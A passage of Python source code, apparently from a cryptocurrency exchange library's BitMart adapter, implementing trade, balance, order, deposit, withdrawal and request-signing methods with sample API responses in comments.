{\"low\":\"404\",\"high\":\"404.3\",\"open\":\"404.1\",\"close\":\"404\",\"last_price\":\"404\",\"avg_price\":\"404.08918918\",\"volume\":\"740\",\"timestamp\":1598758561,\"rise_fall_rate\":\"-0.000247463499133878\",\"rise_fall_value\":\"-0.1\",\"base_coin_volume\":\"7.4\",\"quote_coin_volume\":\"2990.259999932\"},\n # ]\n # }\n #\n data = self.safe_value(response, 'data', {})\n if isinstance(data, list):\n return self.parse_ohlcvs(data, market, timeframe, since, limit)\n else:\n klines = self.safe_value(data, 'klines', [])\n return self.parse_ohlcvs(klines, market, timeframe, since, limit)\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n method = None\n request = {}\n if market['spot']:\n request['symbol'] = market['id']\n request['offset'] = 1 # max offset * limit < 500\n if limit is None:\n limit = 100 # max 100\n request['limit'] = limit\n method = 'privateSpotGetTrades'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n # request['offset'] = 1\n if limit is not None:\n request['size'] = limit # max 60\n method = 'privateContractGetUserTrades'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a06a5c53-8e6f-42d6-8082-2ff4718d221c\",\n # \"data\":{\n # \"current_page\":1,\n # \"trades\":[\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"trades\": [\n # {\n # \"order_id\": 10116361,\n # \"trade_id\": 10116363,\n # \"contract_id\": 1,\n # \"deal_price\": \"16\",\n # \"deal_vol\": \"10\",\n # \"make_fee\": \"0.04\",\n # \"take_fee\": \"0.12\",\n # \"created_at\": null,\n # \"way\": 5,\n # \"fluctuation\": \"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrderTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n method = None\n request = {}\n if market['spot']:\n request['symbol'] = market['id']\n request['order_id'] = id\n method = 'privateSpotGetTrades'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n request['orderID'] = id\n method = 'privateContractGetOrderTrades'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a06a5c53-8e6f-42d6-8082-2ff4718d221c\",\n # \"data\":{\n # \"current_page\":1,\n # \"trades\":[\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"trades\": [\n # {\n # \"order_id\": 10116361,\n # \"trade_id\": 10116363,\n # \"contract_id\": 1,\n # \"deal_price\": \"16\",\n # \"deal_vol\": \"10\",\n # \"make_fee\": \"0.04\",\n # \"take_fee\": \"0.12\",\n # \"created_at\": null,\n # \"way\": 5,\n # \"fluctuation\": \"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def fetch_balance(self, params={}):\n self.load_markets()\n method = None\n options = self.safe_value(self.options, 'fetchBalance', {})\n defaultType = self.safe_string(self.options, 'defaultType', 'spot')\n type = self.safe_string(options, 'type', defaultType)\n type = self.safe_string(params, 'type', type)\n params = self.omit(params, 'type')\n if type == 'spot':\n method = 'privateSpotGetWallet'\n elif type == 'account':\n method = 'privateAccountGetWallet'\n elif (type == 'swap') or (type == 'future') or (type == 'contract'):\n method = 'privateContractGetAccounts'\n response = getattr(self, method)(params)\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"39069916-72f9-44c7-acde-2ad5afd21cad\",\n # \"data\":{\n # \"wallet\":[\n # {\"id\":\"BTC\",\"name\":\"Bitcoin\",\"available\":\"0.00000062\",\"frozen\":\"0.00000000\"},\n # {\"id\":\"ETH\",\"name\":\"Ethereum\",\"available\":\"0.00002277\",\"frozen\":\"0.00000000\"},\n # {\"id\":\"BMX\",\"name\":\"BitMart Token\",\"available\":\"0.00000000\",\"frozen\":\"0.00000000\"}\n # ]\n # }\n # }\n #\n # account\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"5c3b7fc7-93b2-49ef-bb59-7fdc56915b59\",\n # \"data\":{\n # \"wallet\":[\n # {\"currency\":\"BTC\",\"name\":\"Bitcoin\",\"available\":\"0.00000062\",\"frozen\":\"0.00000000\"},\n # {\"currency\":\"ETH\",\"name\":\"Ethereum\",\"available\":\"0.00002277\",\"frozen\":\"0.00000000\"}\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"accounts\": [\n # {\n # \"account_id\": 10,\n # \"coin_code\": \"USDT\",\n # \"freeze_vol\": \"1201.8\",\n # \"available_vol\": \"8397.65\",\n # \"cash_vol\": \"0\",\n # \"realised_vol\": \"-0.5\",\n # \"unrealised_vol\": \"-0.5\",\n # \"earnings_vol\": \"-0.5\",\n # \"created_at\": \"2018-07-13T16:48:49+08:00\",\n # \"updated_at\": \"2018-07-13T18:34:45.900387+08:00\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n wallet = self.safe_value_2(data, 'wallet', 'accounts', [])\n result = {'info': response}\n for i in range(0, len(wallet)):\n balance = wallet[i]\n currencyId = self.safe_string_2(balance, 'id', 'currency')\n currencyId = self.safe_string(balance, 'coin_code', currencyId)\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string_2(balance, 'available', 'available_vol')\n account['used'] = self.safe_string_2(balance, 'frozen', 'freeze_vol')\n result[code] = account\n return self.safe_balance(result)\n\n def parse_order(self, order, market=None):\n #\n # createOrder\n #\n # {\n # \"order_id\": 2707217580\n # }\n #\n # cancelOrder\n #\n # '2707217580' # order id\n #\n # spot fetchOrder, fetchOrdersByStatus, fetchOpenOrders, fetchClosedOrders\n #\n # {\n # \"order_id\":1736871726781,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591096004000,\n # \"side\":\"sell\",\n # \"type\":\"market\",\n # \"price\":\"0.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"0.02000\",\n # \"notional\":\"0.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"8\"\n # }\n #\n # contract fetchOrder, fetchOrdersByStatus, fetchOpenOrders, fetchClosedOrders, fetchOrders\n #\n # {\n # \"order_id\": 10539098,\n # \"contract_id\": 1,\n # \"position_id\": 10539088,\n # \"account_id\": 10,\n # \"price\": \"16\",\n # \"vol\": \"1\",\n # \"done_avg_price\": \"16\",\n # \"done_vol\": \"1\",\n # \"way\": 3,\n # \"category\": 1,\n # \"open_type\": 2,\n # \"make_fee\": \"0.00025\",\n # \"take_fee\": \"0.012\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-23T11:55:56.715305Z\",\n # \"finished_at\": \"2018-07-23T11:55:56.763941Z\",\n # \"status\": 4,\n # \"errno\": 0\n # }\n #\n id = None\n if isinstance(order, basestring):\n id = order\n order = {}\n id = self.safe_string(order, 'order_id', id)\n timestamp = self.parse8601(self.safe_string(order, 'created_at'))\n timestamp = self.safe_integer(order, 'create_time', timestamp)\n marketId = self.safe_string_2(order, 'symbol', 'contract_id')\n symbol = self.safe_symbol(marketId, market, '_')\n status = None\n if market is not None:\n status = self.parse_order_status_by_type(market['type'], self.safe_string(order, 'status'))\n amount = self.safe_string_2(order, 'size', 'vol')\n filled = self.safe_string_2(order, 'filled_size', 'done_vol')\n average = self.safe_string_2(order, 'price_avg', 'done_avg_price')\n price = self.safe_string(order, 'price')\n side = self.safe_string_2(order, 'way', 'side')\n # 1 = Open long\n # 2 = Close short\n # 3 = Close long\n # 4 = Open short\n category = self.safe_integer(order, 'category')\n type = self.safe_string(order, 'type')\n if category == 1:\n type = 'limit'\n elif category == 2:\n type = 'market'\n return self.safe_order2({\n 'id': id,\n 'clientOrderId': None,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': None,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': None,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'amount': amount,\n 'cost': None,\n 'average': average,\n 'filled': filled,\n 'remaining': None,\n 'status': status,\n 'fee': None,\n 'trades': None,\n }, market)\n\n def parse_order_status_by_type(self, type, status):\n statusesByType = {\n 'spot': {\n '1': 'failed', # Order failure\n '2': 'open', # Placing order\n '3': 'failed', # Order failure, Freeze failure\n '4': 'open', # Order success, Pending for fulfilment\n '5': 'open', # Partially filled\n '6': 'closed', # Fully filled\n '7': 'canceling', # Canceling\n '8': 'canceled', # Canceled\n },\n 'swap': {\n '1': 'open', # Submitting\n '2': 'open', # Commissioned\n '4': 'closed', # Completed\n },\n }\n statuses = self.safe_value(statusesByType, type, {})\n return self.safe_string(statuses, status, status)\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n request['symbol'] = market['id']\n request['side'] = side\n request['type'] = type\n method = 'privateSpotPostSubmitOrder'\n if type == 'limit':\n request['size'] = self.amount_to_precision(symbol, amount)\n request['price'] = self.price_to_precision(symbol, price)\n elif type == 'market':\n # for market buy it requires the amount of quote currency to spend\n if side == 'buy':\n notional = self.safe_number(params, 'notional')\n createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)\n if createMarketBuyOrderRequiresPrice:\n if price is not None:\n if notional is None:\n notional = amount * price\n elif notional is None:\n raise InvalidOrder(self.id + \" createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'notional' extra parameter(the exchange-specific behaviour)\")\n else:\n notional = amount if (notional is None) else notional\n precision = market['precision']['price']\n request['notional'] = self.decimal_to_precision(notional, TRUNCATE, precision, self.precisionMode)\n elif side == 'sell':\n request['size'] = self.amount_to_precision(symbol, amount)\n elif market['swap'] or market['future']:\n method = 'privateContractPostSubmitOrder'\n request['contractID'] = market['id']\n if type == 'limit':\n request['category'] = 1\n elif type == 'market':\n request['category'] = 2\n request['way'] = side # 1 = open long, 2 = close short, 3 = close long, 4 = open short\n request['custom_id'] = self.nonce()\n request['open_type'] = 1 # 1 = cross margin, 2 = fixed margin\n request['leverage'] = 1 # must meet the effective range of leverage configured in the contract\n request['price'] = self.price_to_precision(symbol, price)\n request['vol'] = self.amount_to_precision(symbol, amount)\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot and contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"order_id\": 2707217580\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n return self.parse_order(data, market)\n\n def cancel_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'privateSpotPostCancelOrder'\n request['order_id'] = int(id)\n request['symbol'] = market['id']\n elif market['swap'] or market['future']:\n method = 'privateContractPostCancelOrders'\n request['contractID'] = market['id']\n request['orders'] = [int(id)]\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"result\": True\n # }\n # }\n #\n # spot alternative\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": True\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"succeed\": [\n # 2707219612\n # ],\n # \"failed\": []\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n if data is True:\n return self.parse_order(id, market)\n succeeded = self.safe_value(data, 'succeed')\n if succeeded is not None:\n id = self.safe_string(succeeded, 0)\n if id is None:\n raise InvalidOrder(self.id + ' cancelOrder() failed to cancel ' + symbol + ' order id ' + id)\n else:\n result = self.safe_value(data, 'result')\n if not result:\n raise InvalidOrder(self.id + ' cancelOrder() ' + symbol + ' order id ' + id + ' is filled or canceled')\n order = self.parse_order(id, market)\n return self.extend(order, {'id': id})\n\n def cancel_all_orders(self, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelAllOrders() requires a symbol argument')\n side = self.safe_string(params, 'side')\n if side is None:\n raise ArgumentsRequired(self.id + \" cancelAllOrders() requires a `side` parameter('buy' or 'sell')\")\n self.load_markets()\n market = self.market(symbol)\n if not market['spot']:\n raise NotSupported(self.id + ' cancelAllOrders() does not support ' + market['type'] + ' orders, only spot orders are accepted')\n request = {\n 'symbol': market['id'],\n 'side': side, # 'buy' or 'sell'\n }\n response = self.privateSpotPostCancelOrders(self.extend(request, params))\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {}\n # }\n #\n return response\n\n def cancel_orders(self, ids, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' canelOrders() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n if not market['spot']:\n raise NotSupported(self.id + ' cancelOrders() does not support ' + market['type'] + ' orders, only contract orders are accepted')\n orders = []\n for i in range(0, len(ids)):\n orders.append(int(ids[i]))\n request = {\n 'orders': orders,\n }\n response = self.privateContractPostCancelOrders(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"result\": True\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"succeed\": [\n # 2707219612\n # ],\n # \"failed\": []\n # }\n # }\n #\n return response\n\n def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrdersByStatus() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'privateSpotGetOrders'\n request['symbol'] = market['id']\n request['offset'] = 1 # max offset * limit < 500\n request['limit'] = 100 # max limit is 100\n # 1 = Order failure\n # 2 = Placing order\n # 3 = Order failure, Freeze failure\n # 4 = Order success, Pending for fulfilment\n # 5 = Partially filled\n # 6 = Fully filled\n # 7 = Canceling\n # 8 = Canceled\n # 9 = Outstanding(4 and 5)\n # 10 = 6 and 8\n if status == 'open':\n request['status'] = 9\n elif status == 'closed':\n request['status'] = 6\n elif status == 'canceled':\n request['status'] = 8\n else:\n request['status'] = status\n elif market['swap'] or market['future']:\n method = 'privateContractGetUserOrders'\n request['contractID'] = market['id']\n # request['offset'] = 1\n if limit is not None:\n request['size'] = limit # max 60\n # 0 = All\n # 1 = Submitting\n # 2 = Commissioned\n # 3 = 1 and 2\n # 4 = Completed\n if status == 'open':\n request['status'] = 3\n elif status == 'closed':\n request['status'] = 4\n else:\n request['status'] = status\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"70e7d427-7436-4fb8-8cdd-97e1f5eadbe9\",\n # \"data\":{\n # \"current_page\":1,\n # \"orders\":[\n # {\n # \"order_id\":2147601241,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591099963000,\n # \"side\":\"sell\",\n # \"type\":\"limit\",\n # \"price\":\"9000.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"1.00000\",\n # \"notional\":\"9000.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"4\"\n # }\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"orders\": [\n # {\n # \"order_id\": 10284160,\n # \"contract_id\": 1,\n # \"price\": \"8\",\n # \"vol\": \"4\",\n # \"done_avg_price\": \"0\",\n # \"done_vol\": \"0\",\n # \"way\": 1,\n # \"category\": 1,\n # \"open_type\": 2,\n # \"make_fee\": \"0\",\n # \"take_fee\": \"0\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-17T07:24:13.410507Z\",\n # \"finished_at\": null,\n # \"status\": 2,\n # \"errno\": 0\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n orders = self.safe_value(data, 'orders', [])\n return self.parse_orders(orders, market, since, limit)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('open', symbol, since, limit, params)\n\n def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('closed', symbol, since, limit, params)\n\n def fetch_canceled_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('canceled', symbol, since, limit, params)\n\n def fetch_orders(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n if not (market['swap'] or market['future']):\n raise NotSupported(self.id + ' fetchOrders does not support ' + market['type'] + ' markets, only contracts are supported')\n return self.fetch_orders_by_status(0, symbol, since, limit, params)\n\n def fetch_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')\n self.load_markets()\n request = {}\n market = self.market(symbol)\n method = None\n if not isinstance(id, basestring):\n id = str(id)\n if market['spot']:\n request['symbol'] = market['id']\n request['order_id'] = id\n method = 'privateSpotGetOrderDetail'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n request['orderID'] = id\n method = 'privateContractGetUserOrderInfo'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a27c2cb5-ead4-471d-8455-1cfeda054ea6\",\n # \"data\": {\n # \"order_id\":1736871726781,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591096004000,\n # \"side\":\"sell\",\n # \"type\":\"market\",\n # \"price\":\"0.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"0.02000\",\n # \"notional\":\"0.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"8\"\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"orders\": [\n # {\n # \"order_id\": 10539098,\n # \"contract_id\": 1,\n # \"position_id\": 10539088,\n # \"account_id\": 10,\n # \"price\": \"16\",\n # \"vol\": \"1\",\n # \"done_avg_price\": \"16\",\n # \"done_vol\": \"1\",\n # \"way\": 3,\n # \"category\": 1,\n # \"make_fee\": \"0.00025\",\n # \"take_fee\": \"0.012\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-23T11:55:56.715305Z\",\n # \"finished_at\": \"2018-07-23T11:55:56.763941Z\",\n # \"status\": 4,\n # \"errno\": 0\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n if 'orders' in data:\n orders = self.safe_value(data, 'orders', [])\n firstOrder = self.safe_value(orders, 0)\n if firstOrder is None:\n raise OrderNotFound(self.id + ' fetchOrder() could not find ' + symbol + ' order id ' + id)\n return self.parse_order(firstOrder, market)\n else:\n return self.parse_order(data, market)\n\n def fetch_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n if code == 'USDT':\n defaultNetworks = self.safe_value(self.options, 'defaultNetworks')\n defaultNetwork = self.safe_string_upper(defaultNetworks, code)\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network', defaultNetwork) # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string(networks, network, network) # handle ERC20>ETH alias\n if network is not None:\n request['currency'] += '-' + network # when network the currency need to be changed to currency + '-' + network https://developer-pro.bitmart.com/en/account/withdraw_apply.html on the end of page\n params = self.omit(params, 'network')\n response = self.privateAccountGetDepositAddress(self.extend(request, params))\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"0e6edd79-f77f-4251-abe5-83ba75d06c1a\",\n # \"data\":{\n # \"currency\":\"USDT-TRC20\",\n # \"chain\":\"USDT-TRC20\",\n # \"address\":\"TGR3ghy2b5VLbyAYrmiE15jasR6aPHTvC5\",\n # \"address_memo\":\"\"\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n address = self.safe_string(data, 'address')\n tag = self.safe_string(data, 'address_memo')\n self.check_address(address)\n return {\n 'currency': code,\n 'address': address,\n 'tag': tag,\n 'network': None, # TODO: parse\n 'info': response,\n }\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n 'destination': 'To Digital Address', # To Digital Address, To Binance, To OKEX\n 'address': address,\n }\n if tag is not None:\n request['address_memo'] = tag\n if code == 'USDT':\n defaultNetworks = self.safe_value(self.options, 'defaultNetworks')\n defaultNetwork = self.safe_string_upper(defaultNetworks, code)\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network', defaultNetwork) # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string(networks, network, network) # handle ERC20>ETH alias\n if network is not None:\n request['currency'] += '-' + network # when network the currency need to be changed to currency + '-' + network https://developer-pro.bitmart.com/en/account/withdraw_apply.html on the end of page\n params = self.omit(params, 'network')\n response = self.privateAccountPostWithdrawApply(self.extend(request, params))\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"withdraw_id\": \"121212\"\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n transaction = self.parse_transaction(data, currency)\n return self.extend(transaction, {\n 'code': code,\n 'address': address,\n 'tag': tag,\n })\n\n def fetch_transactions_by_type(self, type, code=None, since=None, limit=None, params={}):\n self.load_markets()\n if limit is None:\n limit = 50 # max 50\n request = {\n 'operation_type': type, # deposit or withdraw\n 'offset': 1,\n 'limit': limit,\n }\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n response = self.privateAccountGetDepositWithdrawHistory(self.extend(request, params))\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"142bf92a-fc50-4689-92b6-590886f90b97\",\n # \"data\":{\n # \"records\":[\n # {\n # \"withdraw_id\":\"1679952\",\n # \"deposit_id\":\"\",\n # \"operation_type\":\"withdraw\",\n # \"currency\":\"BMX\",\n # \"apply_time\":1588867374000,\n # \"arrival_amount\":\"59.000000000000\",\n # \"fee\":\"1.000000000000\",\n # \"status\":0,\n # \"address\":\"0xe57b69a8776b37860407965B73cdFFBDFe668Bb5\",\n # \"address_memo\":\"\",\n # \"tx_id\":\"\"\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n records = self.safe_value(data, 'records', [])\n return self.parse_transactions(records, currency, since, limit)\n\n def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions_by_type('deposit', code, since, limit, params)\n\n def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions_by_type('withdraw', code, since, limit, params)\n\n def parse_transaction_status(self, status):\n statuses = {\n '0': 'pending', # Create\n '1': 'pending', # Submitted, waiting for withdrawal\n '2': 'pending', # Processing\n '3': 'ok', # Success\n '4': 'canceled', # Cancel\n '5': 'failed', # Fail\n }\n return self.safe_string(statuses, status, status)\n\n def parse_transaction(self, transaction, currency=None):\n #\n # withdraw\n #\n # {\n # \"withdraw_id\": \"121212\"\n # }\n #\n # fetchDeposits, fetchWithdrawals\n #\n # {\n # \"withdraw_id\":\"1679952\",\n # \"deposit_id\":\"\",\n # \"operation_type\":\"withdraw\",\n # \"currency\":\"BMX\",\n # \"apply_time\":1588867374000,\n # \"arrival_amount\":\"59.000000000000\",\n # \"fee\":\"1.000000000000\",\n # \"status\":0,\n # \"address\":\"0xe57b69a8776b37860407965B73cdFFBDFe668Bb5\",\n # \"address_memo\":\"\",\n # \"tx_id\":\"\"\n # }\n #\n id = None\n withdrawId = self.safe_string(transaction, 'withdraw_id')\n depositId = self.safe_string(transaction, 'deposit_id')\n type = None\n if (withdrawId is not None) and (withdrawId != ''):\n type = 'withdraw'\n id = withdrawId\n elif (depositId is not None) and (depositId != ''):\n type = 'deposit'\n id = depositId\n amount = self.safe_number(transaction, 'arrival_amount')\n timestamp = self.safe_integer(transaction, 'apply_time')\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n status = self.parse_transaction_status(self.safe_string(transaction, 'status'))\n feeCost = self.safe_number(transaction, 'fee')\n fee = None\n if feeCost is not None:\n fee = {\n 'cost': feeCost,\n 'currency': code,\n }\n txid = self.safe_string(transaction, 'tx_id')\n if txid == '':\n txid = None\n address = self.safe_string(transaction, 'address')\n tag = self.safe_string(transaction, 'address_memo')\n return {\n 'info': transaction,\n 'id': id,\n 'currency': code,\n 'amount': amount,\n 'address': address,\n 'addressFrom': None,\n 'addressTo': None,\n 'tag': tag,\n 'tagFrom': None,\n 'tagTo': None,\n 'status': status,\n 'type': type,\n 'updated': None,\n 'txid': txid,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'fee': fee,\n }\n\n def nonce(self):\n return self.milliseconds()\n\n def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n access = self.safe_string(api, 0)\n type = self.safe_string(api, 1)\n baseUrl = self.implode_hostname(self.urls['api']['rest'])\n url = baseUrl + '/' + type\n if type != 'system':\n url += '/' + self.version\n url += '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if type == 'system':\n if query:\n # print(query)\n url += '?' + self.urlencode(query)\n elif access == 'public':\n if query:\n # print(query)\n url += '?' + self.urlencode(query)\n elif access == 'private':\n self.check_required_credentials()\n timestamp = str(self.milliseconds())\n queryString = ''\n headers = {\n 'X-BM-KEY': self.apiKey,\n 'X-BM-TIMESTAMP': timestamp,\n }\n if (method == 'POST') or (method == 'PUT'):\n headers['Content-Type'] = 'application/json'\n body = self.json(query)\n queryString = body\n else:\n if query:\n queryString = self.urlencode(query)\n url += '?' + queryString\n auth = timestamp + '#' + self.uid + '#' + queryString\n signature = self.hmac(self.encode(auth), self.encode(self.secret))\n headers['X-BM-SIGN'] = signature\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if response is None:\n return\n #\n # spot\n #\n # {\"message\":\"Bad Request [to is empty]\",\"code\":50000,\"trace\":\"f9d46e1b-4edb-4d07-a06e-4895fb2fc8fc\",\"data\":{}}\n # {\"message\":\"Bad Request [from is empty]\",\"code\":50000,\"trace\":\"579986f7-c93a-4559-926b-06ba9fa79d76\",\"data\":{}}\n # {\"message\":\"Kline size over 500\",\"code\":50004,\"trace\":\"d625caa8-e8ca-4bd2-b77c-958776965819\",\"data\":{}}\n # {\"message\":\"Balance not enough\",\"code\":50020,\"trace\":\"7c709d6a-3292-462c-98c5-32362540aeef\",\"data\":{}}\n #\n # contract\n #\n # 